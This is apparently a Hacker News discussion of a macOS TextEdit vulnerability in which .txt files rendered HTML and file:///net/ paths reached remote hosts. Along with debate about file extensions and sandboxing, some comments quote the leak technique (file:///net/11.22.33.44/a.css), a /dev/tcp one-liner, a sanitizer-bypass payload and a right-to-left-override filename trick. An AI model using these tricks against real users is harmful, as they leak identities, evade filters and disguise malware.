Oh, man. The idea that TextEdit automatically parsed .txt files as HTML if they started with a certain file signature is problematic...
...but the fact that file:// schemes can access remote files by appending /net/ followed by a domain name is pretty shocking.
I mean, the entire purpose of "file://" would seem to be to provide access to local/mounted files and only those.
The fact that a Mac engineer thought it would be a great "feature" to allow file:// to access the entire internet is... kinda terrifying. Did that get patched, or was it only TextEdit?
> ...but the fact that file:// schemes can access remote files by appending /net/ followed by a domain name is pretty shocking.
Not that shocking. Windows has had that with SMB networking for ages: file://SMBSERVERNAME/path/file . Linux somewhat supports /dev/tcp/HOSTNAME/PORT (technically that's application level in bash so not everywhere), and I'm sure there are daemons you could run to automount things on the fly.
> Linux somewhat supports /dev/tcp/HOSTNAME/PORT (technically that's application level in bash so not everywhere), and I'm sure there are daemons you could run to automount things on the fly.
Do note that this has been disabled in the major distributions at compile time for pretty much forever. The Debian bug asking to build bash with that feature enabled by default is ~20 years old (and was closed as wontfix).
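For the curious, what bash's /dev/tcp redirection gives you is roughly a file-like handle backed by a TCP connection. A minimal sketch of the same idea in Python (an ordinary socket, no /dev/tcp involved):

```python
import socket

def dev_tcp(host, port):
    # Roughly what `exec 3<>/dev/tcp/host/port` does in bash:
    # return a file-like object backed by a TCP connection, so
    # reads and writes look like ordinary file I/O.
    sock = socket.create_connection((host, port), timeout=5)
    return sock.makefile("rwb")
```

In bash itself the classic one-liner is something like `printf 'GET / HTTP/1.0\r\n\r\n' >/dev/tcp/example.com/80` - when the feature is compiled in, which as noted above it often isn't.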
Except permissions aren't granular enough / are too confusing, it's a giant footgun with the current Linux architecture, which doesn't have all the nice things Plan9 does
I didn't say that the everything-is-a-file philosophy is necessarily correct and well implemented on Linux. Merely that if you were to continue along this direction, it would seem like a logical next step. I don't think I'd use this for anything but shell scripts, at best. But especially if you are a Plan 9 fanatic, it would seem like quite a good idea, which is what the original question was about.
I'm no specialist but I'm inclined to disagree, for me it's the difference between the ability to run an arbitrary binary and the ability to read/write an arbitrary filepath
SMB is more understandable though, since you have more trust for things on your local network, and an attacker usually won't have control over those resources. And it's a fairly common and reasonable expectation in a business environment that network drives appear as part of the filesystem.
Whereas a domain name over the open internet is an entirely different story.
Actually, if I'm not mistaken, it was only after Microsoft decided to fight the browser war that they broke the barrier between the file system and the internet. It wasn't in the early versions of Windows or IE. That integration is one of the major mistakes Microsoft made. And, surprise, Apple fell for it as well.
Can't trust these two, so... who can we trust for network security?
Most likely nobody decided to have file:// access the network. Most likely, someone decided to make file:// the scheme for accessing files, and someone else decided to mount the network as a file.
It's not specific to the file:// URI scheme; /net is an actual filesystem path that works with anything that accesses paths. Or used to work, anyway; it was recently changed to be disabled by default.
> In Unix everything is a file. Files are files, folders are files, disks are files, your keyboard is a file, your mouth is a file, the air is a file, you can't breathe, your file lungs fill with files and you try to scream but only files come out oh god Dennis how could you do this
How is that? Per-process namespaces in Plan 9 seem like a good idea for isolation. "Everything is a file," but what is and isn't accessible can be managed on a per-process level.
In POSIX we only generally get a user/group level of granularity which seems to practically mean that only daemons are completely isolated.
I disagree. Use a second process that has a limited namespace where you've mounted only the local files you want an HTML document to be able to refer to and an IPC socket marked for exclusive use. The first process resolves file links and reads file contents via IPC to the second process.
In the article, the remote file's contents were not malicious, but merely trying to access it was. That would require a very different security posture to "assume all files are malicious".
I don't think "everything is a file" is necessarily bad. What's worse is "every application I run has access to every resource that the OS gives my user access to".
Would be nice if the operating system could set up a fresh, temporary "user" for each application installed, and instead run the application as that user, who starts out with no access to computing resources. Maybe some existing systems already sandbox apps into their own unprivileged users, I don't know, but it would probably be very secure.
Modern operating systems can; there is quite granular control.
But when such sandboxes are attempted, they often turn out to be more complex than originally thought: applications need many resources which were not originally considered, so they are given those resources, and very often those resources can be used to construct more resources or otherwise escape the sandbox to some degree.
> perhaps this is the worst possible abstraction to be protected by a security framework.
I honestly don't understand how anyone with at least a basic understanding of how OSes are designed and operated could ever arrive at that conclusion. The layers of wrong assumptions required to support that assertion are at the level of "not even wrong" confusion.
I fail to see how HTTP and REST's "everything is a resource" paradigm is significantly different from UNIX's "everything is a file" paradigm, and I've yet to see anyone claim that the freedom and power to open any HTML document (OMG, a file!) made available through the internet is a mistake or a bad design decision.
Several ways. In Unix files are streams of bytes. In HTTP resources are complex entities with MIME types, multiple representations, encodings, etc. HTTP URL structure supports parameters and there is a method for providing data and obtaining a result back, a sort of RPC.
On the other hand, Unix has users and permissions; HTTP does not, and you have to build your own.
Looking in /etc/auto_master, which is the configuration for Autofs, the /net mount point is commented out by default. I do not know when (or if) it was ever turned on by default.
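For reference, the relevant stanza looks like this on recent macOS (quoting from memory, so exact options may differ by version; the point is that the /net line ships commented out):

```
# excerpt from /etc/auto_master
#/net    -hosts    -nobrowse,hidefromfinder,nosuid
```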
I'm still running Mojave (10.14.x) and it is uncommented. The file dates to 2014, so I suspect it was set up with the original OS that came with this machine.
A file can be accessed locally, on a private network, or over the internet. /net/ is redundant with downloading a file over HTTP, so there's an argument there, but accessing a local network file through HTTP requires a web server, which may not be desired. Having /net/ solves that problem, but of course it works the same way over the open internet, so... we're kind of screwed, really.
File extensions are routinely used by all sorts of software, at least as hints if nothing else. For example, gcc will handle files named .c differently from files named .cpp, and will not even work with static libraries unless they are named .a.
It's always seemed strange that an application called TextEdit is actually more than a text editor. I strongly believe that content-type autodetection, much less HTML rendering(!), most certainly does not belong in a text editor.
Here's an interesting quirk in Windows: There are two APIs to execute external programs, CreateProcess and ShellExecute. CreateProcess is the older of the two and only runs executables. ShellExecute opens the target with whatever app is associated with the extension.
When they shoehorned the ShellExecute behavior into cmd.exe, they basically just said "if (!CreateProcess(foo)) {ShellExecute (foo)}"
As a result, if you take "foo.exe" and rename it "foo.txt" then try to run it like "C:\>foo.txt" from the command line, it will run as an executable instead of opening in Notepad like you would expect. Do the same with a real text file (that doesn't start with "MZ") and it opens in Notepad.
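The magic-number check involved can be sketched like this (a toy model of the fallback described above, not actual Windows code; the function names are made up):

```python
def looks_like_exe(path):
    # PE/DOS executables start with the two-byte magic "MZ";
    # the Windows loader keys off content, not the extension.
    with open(path, "rb") as f:
        return f.read(2) == b"MZ"

def run_command(path):
    # Toy model of the cmd.exe behaviour: try CreateProcess
    # semantics first, and only fall back to the file-association
    # handler (ShellExecute semantics) if that fails.
    if looks_like_exe(path):
        return "CreateProcess"
    return "ShellExecute"
```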
This is a frustrating behavior on Windows, not because it's possible, but because it's the default. I vastly prefer the way KDE handles it: whatever the default program for that file type is attempts to open it, and you can easily change what the default is.
It's frustrating when I instinctively change a file extension on Windows so I can do some other operation with it (say changing a configuration file to .txt to edit it) and Windows still doesn't know what to do with it.
I'm not averse to the behavior, I just wish I could control when it happens.
It's a rich text editor by default. Rich text is still text.
Opening HTML files and converting them to rich text certainly does belong as a valid feature for a rich text editor. It'll open and convert Word files too, which is super useful.
The content-type autodetection, however, I agree was a bad idea. Still, this vulnerability presumably existed with an .html file opened in TextEdit.
I assume the content-type autodetection exists because of how downloading files occasionally appends a .txt extension (I think this is when the content type is text/plain). Postel’s law gets applied with the result of macOS attempting to make up for misconfigured servers.
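The kind of signature check involved might look like this (a hypothetical sketch of content sniffing, not Apple's actual code):

```python
def sniff_html(data: bytes) -> bool:
    # Treat the file as HTML if it begins with an HTML-looking
    # signature, regardless of its .txt extension -- the
    # Postel's-law behaviour that backfires here.
    head = data.lstrip()[:64].lower()
    return head.startswith((b"<!doctype html", b"<html"))
```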
If the file extension is .txt, I always expect it to be opened as plain text. The file extension is, rightly or wrongly[0], the metadata declaring the file type — nobody would consider it reasonable for an .exe to remain executable if the extension is changed to .txt, after all.
One might, possibly, still argue about the text encoding of a .txt file (I’m old enough to remember Unicode being a new fancy alternative to ASCII), but that’s about it.
> If the file extension is .txt, I always expect it to be opened as plain text. The file extension is, rightly or wrongly[0], the metadata declaring the file type — nobody would consider it reasonable for an .exe to remain executable if the extension is changed to .txt, after all.
That statement is quite wrong and shows a good dose of ignorance. To start off, in UNIX systems the extension means nothing regarding whether a file is executable or not. All it takes is a +x flag and a file format (header, magic number) that can be executed.
Also, file extensions mean nothing. In fact, a popular and very basic trick to fool clueless users into running malware (and one which any anti-malware tool checks for) is to sneak in executables with a different extension, because the extension only means something to clueless users.
And a .txt file extension means nothing at all. The only things that matter are the file contents and its permissions.
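A sketch of that rule in Python (simplified; the kernel recognises more formats than just these two):

```python
import os, stat

def unix_executable(path):
    # The name is irrelevant: what matters is the execute permission
    # bit plus content the kernel can run -- here just ELF magic or
    # a #! shebang line, for illustration.
    if not os.stat(path).st_mode & stat.S_IXUSR:
        return False
    with open(path, "rb") as f:
        head = f.read(4)
    return head.startswith(b"\x7fELF") or head.startswith(b"#!")
```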
TextEdit dates back to NeXTStep, so it was originally written in the late 1980s, probably. Guessing it didn't render HTML originally, but it always had RTF capability. Not that it's an excuse in 2021, but very few applications from that era would be considered "safe" today.
Edit.app is the original NeXTSTEP text editor from 1989. It supported plain text and rich text files. Famously, the first web browser was based on the rich text capabilities built into NeXTSTEP.
TextEdit.app is the OpenStep rewrite of Edit.app and dates to the mid 1990s. It was likely one of the first OpenStep apps. It supported the same rich text files as the original Edit.app.
Apple bought NeXT, OpenStep became Cocoa, TextEdit was ported to Java, and then back to garbage collected Objective-C, then ARC Objective-C, (then Swift, probably).
Along the way it picked up features for reading/writing/editing HTML and Microsoft Word documents.
Apple used to publish the source code for TextEdit as part of their Xcode sample code, but they stopped a few years ago.
Java was supposed to be the primary programming language for OS X. That's why they renamed OpenStep to Cocoa (Java and Cocoa go great together).
But AppKit was still pure Objective-C, and bridging between AppKit's Obj-C APIs and the Java language presented problems. Third-party developers (eventually) preferred to write directly in Objective-C, and Apple dropped the Java bridge some years later.
NeXT used Display PostScript for the display manager. If you opened an email that had PostScript commands, the mail agent would happily, automatically, execute them.
A favorite payload sent around the computer lab would smear all pixels downward to "melt" whatever was rendered on your display.
Note that there weren't that many interesting things to exfiltrate back then, so this wasn't a terrible default: there wasn't (any!) online commerce, online banking was rare, and even passwords were never echoed to the terminal.
You don't need a password to be echoed to exfiltrate it. You just need the key codes. Not sure about NeXTStep, but regular old X let you sniff keys really easily.
Some systems (specifically, earlier versions of SGI IRIX) shipped with X authorization disabled by default. This is the equivalent of "xhost +". You could sniff a box as soon as it was plugged into the network, including capturing login session credentials, all terminal commands, and anything else. When they su'd to root, yes, you'd capture the root password.
In those days (mid 90's) almost nobody was running firewalls. At least, nobody in these parts. Putting your "office on the Internet" meant raw, unfiltered IP.
According to you. I appreciate that TextEdit is a rich editor. I can use vim or countless other apps for plain text. Few do what TextEdit does with its simplicity.
Neither is the opinion that "This problem exists because someone wrote a tool that should only do one thing (really well) but instead made it do five different things."
You can make security bugs in simple tools - this security bug is not purely a function of the number of target use-cases.
Nor do you have any rational basis for asserting that the given app "should only do one [thing]".
>>Anyone with networked filesystems, I should imagine?
You're either missing the point made by GP or being disingenuous. Please keep in mind that you need to explicitly mount an NFS share before you're able to open it, and mounting an NFS share not only requires explicit authorization but also only provides access to a specific file system, mounted at a specific point, under specific permissions.
Accessing the whole internet through file:// without being prompted for permissions or consent or even awareness is an entirely different thing. For starters, the access is not explicit nor subjected to conditions.
Rigidly interpreting documents depending on their file extension is worse than trying to figure out the type of a document before interpreting it. File extensions are a brittle and primitive system that does not fix any security issue.
Optimizing for "simple" for the sake of robustness is exactly backward.
> visible and understandable
False. Something is neither visible nor understandable if it's misleading - which file extensions are. There are absolutely no guarantees that a file extension will match file contents, and that assumption can cause security risks - like in this article.
An actually good alternative is to encode file type as metadata, instead of inside the file contents or file-name, and then configure viewers to display it. That, while not "simple", is also visible and understandable to the user, while simultaneously being safe.
> There are absolutely no guarantees that a file extension will match file contents, and that assumption can cause security risks
Only in software that ignores the extension.
> An actually good alternative is to encode file type as metadata, instead of inside the file contents or file-name, and then configure viewers to display it. That, while not "simple", is also visible and understandable to the user, while simultaneously being safe.
Metadata can be just as wrong as a file extension, and is generally far less visible.
The problem is that the text editor ignored the extension of the txt file. That's what led to the unsafe behaviour - the user thought the file was fine to open because the extension was txt, and improving users is not practical.
The exact same thing would happen with metadata - indeed file extensions are just a form of metadata - if the metadata says this is a text file but the application ignores it, we would have the exact same issue.
> They are also trivial to get wrong, can be mangled when the files are moved around, and are easy to use as an attack vector.
On the contrary, they're the only kind of metadata that doesn't get mangled when files are moved around, and they're far less of an attack vector than other approaches. Of course you can set the wrong file type, but no approach avoids that problem.
If you don't want text editors to do non text-editing stuff, then people need to stop saying we should build development environments around text editors. "An IDE is just a text editor with bells and whistles", people say. Well if that's the case, it's not surprising if people "only ship the one text editor".
But not with file extensions of .txt. They should only add bells and whistles if the extension warrants some bells. .md? Sure, syntax-highlight me. But opening a .txt and treating it as HTML seems strange.
Well, on Unix file extensions are a convention and don't have any strict semantic meaning. Maybe this doesn't make sense in a world where most people do think in terms of file extensions (thanks to the popularity of Windows) but it shouldn't be surprising that non-Windows programs might not special-case file extensions.
(Though in fairness, text editors do usually have special casing for file extensions and these days tools like ls will colour filenames based on the extension.)
This is only a Unix vs Windows thing in terms of the application launcher and how it is implemented. File extensions are semantically meaningful for many unix tools, most notably gcc.
I don't know anyone who says that an IDE is just a text editor with bells and whistles. Visual Studio Code is a text editor with more bells and/or whistles than a choo-choo train, but that doesn't make it any more of an IDE than nano and termux.
It compiles and debugs, that seems like an IDE to me.
VS Code is cool and all, but it definitely is a lot more manual and laborious than VS. The tooling and automation in VS is missed if you're used to it.
Yesterday grep didn't work because it 'autodetected' that the target file was binary. So I 1) cursed whoever made this non-backward-compatible change, and 2) used man to find the '-a' option.
Hah, looks like I've been needlessly typing quite a few extra keystrokes, as I've always done --binary-files=text. I should have looked at the man page more closely.
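For anyone curious, the heuristic is roughly "is there a NUL byte near the start of the file" (a simplification; GNU grep's real check also considers things like encoding errors):

```python
def grep_thinks_binary(data: bytes) -> bool:
    # Rough sketch of the binary-file heuristic: a NUL byte in the
    # first chunk marks the file as binary, and matches are then
    # suppressed unless you pass -a / --binary-files=text.
    return b"\x00" in data[:32768]
```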
It can do some sketchy things and rewrite your terminal in weird confusing ways, but afaik most of the out-and-out malicious escape sequences have been patched out at least a decade ago.
Any vulnerability in the escape sequence handling of the terminal emulator, and conceivably, depending on what sequences your terminal supports, access to facilities like local file generation or clipboard contents. There have been a number of issues with escape sequences injected into things people might copy and paste from a web page, or in git commit histories, that have done nefarious things.
I think this captures my sentiment on the matter as well. Applications today want to be a swiss army knife and do just about every job.. and do it poorly. I do expect that level of complexity from RStudio, but probably not from Notepad. I would probably kinda accept it in Notepad++.
So, real question: is TextEdit the default text editor on a Mac?
File extensions are a kludge anyway. (And Windows 10 still hides them by default, because hey, backwards compatibility, and you wouldn't want to confuse Grandma who's seen the file be called "grandkids" since Windows 95..).
Why should the filetype be dependent on the name? People even think renaming a .BMP to .JPG means now it's a compressed file!
Old school Macs stored the filetype outside of a file, so you can rename the file "grandkids.mp4" and double-clicking it would still open it in the image viewer.
Not really outside. The metadata was stored in a so-called "resource fork", with the file contents proper in a "data fork", both of which belonged to the file per se. Part of the resource fork was the "creator code", four bytes identifying the application which had created or could open the file, and the "type code", four more bytes defining which, among the potentially many kinds of files a given application could open, this file actually was. Binaries were stored in the same format, with IIRC an extra bit somewhere flagging them as executable.
Classic Palm OS used an identical scheme, and for both platforms there was a freeware "ResEdit" application you could find to let you edit resource forks without paying for a real developer toolkit.
Yes, and it sounded great on paper but was horrible for interoperability because a file was not self contained from the POV of filesystems that didn't support the resource fork. Every file you wanted to distribute cross platform needed 2 versions. One with all that metadata bundled up for Mac, one without it for everything else. It was a nightmare
>I understand why they would do it, but it makes you wonder how much better our systems could be if it weren't for concerns about legacy.
Concern for legacy is the only thing keeping the field of computing sane these days. If every operating system worked with radically different standards for basic things like filesystems, a significant amount of bespoke work would need to go into each build of every piece of software, and we could very quickly encounter a monopoly scenario where only the rich could afford to develop apps for everyone. All of this is not to say that there aren't already systems doing this: Haiku and Plan-9 are about as esoteric and non-conformant as they get, and their reward for that is a minuscule but dedicated userbase. If Apple wants to make the computer a better experience for the end user, then they're going to have to play ball.
> This makes me sad - it was dropped because of problems with other operating systems, not because it was necessarily a bad architecture.
No, it was dropped because it was designed without enough forethought given to how that metadata would be transmitted over the wire, or preserved when multiple files were bundled together. Even if every OS used this scheme, a better solution to these problems would have had to be devised.
Are extensions perfect? No, they suck. But they solve this metadata transfer problem "well enough" and therefore won the war.
PS - There was also a lack of user management tools/feedback on a lot of systems, for example changing the "file type" was often impossible out of the box, and the file types often unclear unless you went into details/properties on purpose (a potential security headache, up there with hidden extensions ala Windows).
Microsoft removed the file type manager in Vista(?), so it's no longer as simple to change what software opens arbitrary file extensions. You now need to have a file with the extension you want to change the default for, use 'open with', and check the 'use by default' button. If you want to change a bunch of file types by copy/pasting an exe path, sorry, you can't do that without editing the registry. And with the new method of changing programs that open groups of file types (i.e. documents or html), the program you're running needs to be registered as something that can do so, or it won't appear in the list. Want to change all image formats except gif (jpg, png, tiff, bmp, wmf, emf, and so on) to a different image viewer? Your options are to change them all then change gif back, or to change them individually.
I think there's a location in the new settings for listing all file type associations, but it still doesn't allow copy/pasting paths for multiple fast modifications. If you want to change the name of a file type as it appears in the file type column in explorer, or want to change the icon used for a type of file to something other than that of the application used to open it, that's no longer possible without editing the registry.
Yeah, it was painfully overcomplicated for sure - Palm OS did it much more seamlessly for cross-filesystem interop, but it was only when SD cards and /Palm/Launcher came along and you didn't really need Hotsync any more that it really got comfortable. It was very much of its time and I don't regret that it's gone, but it was certainly a clever and interesting design.
I was in my tweens/early teens when I learned about ResEdit. I thought it was some kind of hacker tool, and I was amused at the various things I could change.
I used to add menu items (that didn’t do anything), I was able to change picture/icon resources inside apps, all kinds of fun stuff. Change command mapping, etc
Changing app icons was the big thing for me. I learned about that as a tiny child at computer camp, and I thought the high school kid who introduced me to it must be just about the coolest guy in the world.
On the contrary, it's a simple and explicit (when not stupidly hidden...) way of denoting the file type, which is great for interoperability and information interchange.
Proprietary, opaque mechanisms like resource forks only serve to keep users uninformed (and thus unlearning) and impede the free interchange of information between different applications.
I don't actually think file extensions are such a bad system.
Filenames exist to provide context for the data inside. "Draft 2020 Quarterly Report.txt" and "Draft 2020 Quarterly Report.csv" could contain the exact same data, but the file extension indicates how the file is intended to be used, just as "2020" indicates the relevant year and "Draft" indicates completeness.
The cool thing about the Classic MacOS file type/creator system is that what app opened a file was not dependent solely on the file type, but also on the app that created it.
So if you downloaded a GIF file of a cute cat, it would open in your image viewer, but if you were working on drawing your own GIF image, it would open up in your image editor.
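That dispatch amounts to a two-level lookup, sketched here as a toy model (the app names and creator codes are made up, though four-character type codes like 'GIFf' are real):

```python
def choose_opener(file_type, creator, by_creator, by_type):
    # Classic Mac OS style: prefer the app registered for this exact
    # (type, creator) pair, then fall back to any app registered for
    # the type alone.
    app = by_creator.get((file_type, creator))
    if app is not None:
        return app
    return by_type.get(file_type)
```

So a GIF you drew yourself (creator = your editor) reopens in the editor, while a downloaded GIF with an unknown creator falls through to the generic viewer.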
But we have file timestamps, permissions and other attributes. There could easily be a "file type" field too, that seems more natural than shoving this metadata into the title.
As I see it, a timestamp is "non-negotiable". The file was last modified on April 22, 2001. There's no difference of opinion, the time is what it is.
But the file extension partially reflects a user's intentions. A stylesheet named "style.css" is intended to be used by a browser directly, whereas one named "style.scss" is expected to go through a preprocessor, but the two might have the exact same contents, and I might decide to just change one to the other, and that's okay.
I take your point about permissions, which are expected to be set by the user. Of course, I actually run into problems caused by incorrect permissions all the time. Maybe it would be better to encode those in the file name! (Although I don't know how you'd do it without creating a mess, and potentially security issues.)
In the age of the internet, file extensions are a good idea, they should be visible by default, and people need to learn to recognize them. There's a lot of malware that gets people to run it by being an executable with an icon of an innocent file type, like an image. If you don't see extensions, you have no idea it's an .exe instead of a .jpg.
It would be kind of neat if changing the extension of a file caused it to be converted automatically. It would save a bunch of typing and browsing around. Just rename a directory to foo.tar.gz and it gets compressed and tarred. I'm not saying that the kernel should be doing that, but it feels like a nice abstraction for some UI.
This is one of those ideas that seems nice in theory but in practice would just lead to so many subtle problems especially if it happened automatically.
Lots of programs create temporary files by changing the extension temporarily but if the kernel were attempting to intercept and change the internal data you could never guarantee the state of your file data. Not to mention potentially renaming an extension to an automatically handled extension and having that data irrevocably altered without you even realizing it.
Then of course there's the fact that there are usually lots of options associated with converting a file. Jpg needs visual compression levels, mp3 needs bitrates, etc.
But why tar it in the first place? If you want to share a directory, the system can tar it for you behind the scenes. Also, the system can zip anything behind the scenes, without the user knowing.
I guess it would make sense if you want to archive it and save some disk space. It also not always clear to the system that you are sharing a directory, if you drop it on a network drive, for instance. But yes, I think zipping a directory is not the most compelling use case.
I do remember resource forks, but I thought content-detection was also a generally accepted pattern on 90s-era Macs because of the lack of file extensions?
(If you had a safe content-detection code-path -- admittedly a harder thing to guarantee these days -- that could certainly be safer than relying on users to not "open grandkids.bmp.exe" or "rename a downloaded.txt to autoexec.bat".)
I always found it a bit funny to see the 'typing' hygiene vary between OSes just like between programming languages. Windows lets you cast anything; classic MacOS had the application being the sole type constructor, in a way. Very functional.
They're dangerous too! I remember seeing malware as an attachment to an email with the file name "somefile.exe.bmp", which looks safe, but when saved on Windows it landed on disk as "somefile.bmp.exe", because some Hebrew character flipped the last two extensions around!
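The character in question is actually the Unicode right-to-left override (U+202E) rather than a Hebrew letter, but the effect is as described. A small demonstration:

```python
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE

# Stored on disk, the name really ends in .exe, but a renderer that
# honours the override displays everything after it right-to-left,
# so the user sees something like "somefile.exe.bmp".
stored = "somefile." + RLO + "pmb.exe"

assert stored.endswith(".exe")  # the OS still sees an executable
```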
Meta comment: The custom scroll behaviour on that site is awful. I hate sites that try to "improve" the behaviour of scrolling by making it faster/slower than normal.
I've been racking my brain trying to figure out just what "benefit" is had by this type of scroll-jacking, but to no avail. It doesn't seem to help in any way, and all it does is frustrate the user.
Luckily the spacebar behaviour remains untouched, but you shouldn't have to experiment with each and every snowflake webpage just to have the default actions act as you would expect.
It's not the author's fault necessarily. Well, they _did_ choose the template and decided to keep it. But the template comes from a company that targets WP templates towards Female Entrepreneurs, most likely in a bid to win some slice of Google's keyword share with "Feminine Blogger Templates". Not sure what my point is, except that maybe they are incredibly out of touch with a lot of things these days. And I'll leave it there. This is turning into an unintended stream-of-thought rant. Sorry!
Which is very interesting in and of itself, as that's not how dangling markup attacks usually work (normally it would send the unparsed HTML, not the result of parsing the HTML). Not to mention wtf the non-standard <iframedoc> tag is and how it differs from an iframe.
But my broader point was less the how, and more that the style of writing was obnoxious.
There are a lot of ways HTML can leak information. HTTPLeaks is an attempt to create a test for all such leaks. Unfortunately, people keep inventing new ways for HTML interpretation to leak data. The article describes a particularly clever approach accidentally implemented by Apple.
I don't know what people expect - don't run code you don't trust. There are also lots of ways for Python to leak data if you execute a malicious Python script.
It's not about running code, it's about opening a TXT file with the operating system default handler for TXT files.
So what you are saying is basically 'do not open any files or websites you don't trust' - which is usually not what people expect, as that would basically mean 'don't use your computer'.
More specifically, I'm saying the web is designed around making network requests. If your threat model is not to make network requests, you shouldn't try to sanitize HTML via blacklists, because you'll be in for a bad time. (Responding to the grandparent's list of HTML leaks, not the article. I agree that it's unreasonable that the txt file does anything. The mistake is in the Apple devs trying to sanitize HTML, which is doomed to failure.)
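A toy illustration of why blacklist sanitization is doomed: a single-pass filter that strips a forbidden substring can be defeated by nesting the substring inside itself. (This hypothetical sanitizer is mine, not anything Apple actually ships.)

```python
def naive_sanitize(html: str) -> str:
    # Blacklist approach: delete every occurrence of "<img",
    # but str.replace only makes a single pass over the input.
    return html.replace("<img", "")

# Nesting the forbidden token inside itself survives the filter:
payload = "<im<imgg src=x>"
cleaned = naive_sanitize(payload)
print(cleaned)  # <img src=x> -- removing the inner "<img" reassembled the tag
```

Whitelist parsing (keep only known-safe constructs) doesn't have this failure mode, which is why it's the standard advice.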
The bug is fixed now, as the article notes at the end. I cannot reproduce this at all now. When I put HTML in an actual .txt file, TextEdit opened it showing the markup, not the rendered content. This is regardless of whether I check or uncheck the "Display HTML files as HTML code instead of formatted text" checkbox in Preferences.
It would only leak your real IP if you were using a proxy through your browser, right? If you were using a VPN it would give the VPN server's IP address?
edit: comment hidden, probably due to new account. Leaving it up just for reference
Well, /net is entirely disabled by default as of recently, so this entire method is no longer applicable.
However, since you asked, here is some useless information:
With /net or remote filesystems in general (NFS and SMB), the network accesses are performed by the kernel directly, rather than by the application using networking syscalls. Therefore, sandboxing network access from specific applications won't affect it.
Big Sur doesn't actually have a permission dialog for network access. But TextEdit does use the (long-existing) App Sandbox system, which is based on applications statically declaring permissions they need. Since TextEdit doesn't request a networking entitlement, it's prohibited from accessing the network directly; as I said, that doesn't include remote filesystems.
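For reference, sandboxed Mac apps declare network access with entitlement keys like the one below in their `.entitlements` plist; an app that doesn't declare it is blocked from making direct outbound connections. (A hedged illustration of the key, not TextEdit's actual entitlements file.)

```xml
<!-- Outbound network access for a sandboxed app. Without this key,
     direct socket use is denied - but kernel-mediated remote
     filesystem mounts are handled separately, as noted above. -->
<key>com.apple.security.network.client</key>
<true/>
```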
From the OP it sounds like there is a very weird feature/component in MacOS called "AutoMount" and/or "AutoFS" that lets HTTP GET network requests be made via reading file system locations... and it may somehow escape other access controls?
I too am curious for more details about this. Where did this feature come from, how has it been used, has it actually been used?
Is AutoMount/AutoFS still there after this CVE patch? Does it indeed circumvent Access Control or other such things? Is it a likely path for other security problems?
The only thing I know about this is what I learned from the OP reporting the vulnerability. Maybe I was mistaken that the request was HTTP? Anyway, the rest applies, assuming the article is correct in describing the nature of the vulnerability.
Anyway, if this is how TextEdit got around macos access controls related to network activity, I wonder if this is a route for other apps, including malicious ones, to get around it too?
> After digging into OSX internals, I came across the AutoMount feature that lets file:/// urls make remote requests. AutoFS is a program on OSX that uses the kernel to make a mounting request to a drive. Automount can also make remote requests to an external drive. Doing 'ls /net/EXAMPLE.com' forces OSX send a remote request to EXAMPLE.com
> While they did a good job blocking TextEdit from making external requests, this was the one thing they forgot when they allowed file:/// scheme, on OSX file:///net/11.22.33.44/a.css connects to 11.22.33.44.
It’s not that weird, but probably less widely used now; it’s wrapped up with NFS - SunOS had this starting back in the eighties and it’s really handy.
You can also do much the same including HTTP access with UNC on Windows.
Both will follow normal network file access controls in their respective environments.
As for the why? It’s a really easy way of sharing resources between computers, and also way more efficient and easier to manage than static mounts.
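Concretely, the /net behavior comes from the automounter's `-hosts` map. macOS has shipped a line along these lines in `/etc/auto_master` (exact options may vary by version):

```
# /etc/auto_master (excerpt)
# The -hosts map makes /net/<hostname> auto-mount that host's exports
# on first access, e.g. `ls /net/example.com` triggers a mount attempt.
/net    -hosts    -nobrowse,hidefromfinder,nosuid
```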
> Man who thought TextEdit could be trusted as a plain text editor is wrong
This is one more example of what I find so frustrating about macOS, which is all those hidden little features trying to be "smart" and "user friendly" just in case I the user do not really know what I'm doing.
MacOS, too? That's a classic Microsoft kind of bug. At one point in the Windows XP era, Windows would execute anything that came anywhere near a desktop machine - USB sticks, CDs, web sites with install files... "Ease of use", right? They gradually tightened up.
Fascinating, I've always been annoyed when Textedit would open a .txt file and treat it as rtf/html. In retrospect that's a pretty obvious attack vector :/
For attachment handling there's really a need for a service that takes the file in light of the uploaded suffix and MIME type, and normalizes or rejects it (in a sandbox) based on how safe for consumption it is for common apps that handle that kind of file. For normalization, e.g. Ghostscript can convert PDFs to PDF/A that contain no scripts, images can be recoded, etc. Open source project idea? Or is there something like this already?
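A sketch of the Ghostscript normalization step such a service might run. The `gs` flags are real Ghostscript options; the wrapper function and file paths are hypothetical:

```python
import subprocess

def pdf_to_pdfa_cmd(src: str, dst: str) -> list:
    """Build a Ghostscript command that rewrites a PDF as PDF/A,
    dropping interactive features such as embedded JavaScript."""
    return [
        "gs",
        "-dPDFA=2",                # target the PDF/A-2 profile
        "-dBATCH", "-dNOPAUSE",    # run non-interactively
        "-sColorConversionStrategy=UseDeviceIndependentColor",
        "-sDEVICE=pdfwrite",
        "-sOutputFile=" + dst,
        src,
    ]

cmd = pdf_to_pdfa_cmd("upload.pdf", "safe.pdf")
# Inside the sandboxed service, something like:
# subprocess.run(cmd, check=True, timeout=60)
```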
So whenever the program used for extracting ZIPs has a vulnerability any website could force-download a malicious ZIP and it would automatically be extracted and trigger the vulnerability...
Why is "force-download" even a thing? IMO the browser should always ask before downloading any file. Though this is not a unique Mac thing, I believe Chrome does that everywhere.
> It seems TextEdit for some reason thought it should parse the HTML even while the file format was TXT. So we can inject a bunch of limited HTML into a text file, now what?
Well, what's a file type unless you know it from context, for example a special file system attribute that's set to "text/html"? Heuristics. At the very least, I think it's better to ignore file "extensions" completely when dealing with the data inside than to make them the deciding factor.
libmagic, which powers a lot of file(1)'s work, is called libmagic for several reasons.
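In the spirit of libmagic, content sniffing keys off leading "magic" bytes rather than the filename. A tiny sketch (real libmagic has thousands of rules plus heuristics):

```python
# A few well-known file signatures mapped to MIME types.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"%PDF-": "application/pdf",
    b"GIF89a": "image/gif",
    b"PK\x03\x04": "application/zip",
}

def sniff(data: bytes) -> str:
    """Return a MIME type based on the file's leading bytes."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return "application/octet-stream"

print(sniff(b"%PDF-1.7 ..."))    # application/pdf
print(sniff(b"just some text"))  # application/octet-stream
```

Of course, sniffing is itself a heuristic - which is exactly how "a .txt file that starts like HTML" bugs happen.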
haha, after using OS X since the beginning, I have never even looked for this. After the first time I realized it was rich text like WordPad and not a plain text editor like Notepad, I never even attempted to use it for anything text related. Better app options were available for pure text anyways. BBEdit was my gold standard in the way-back days.
I think both sound equally valid. One sort of expands to "a GUI editor for plain text" in my mind and the other is more like "a plain text editor with a GUI."
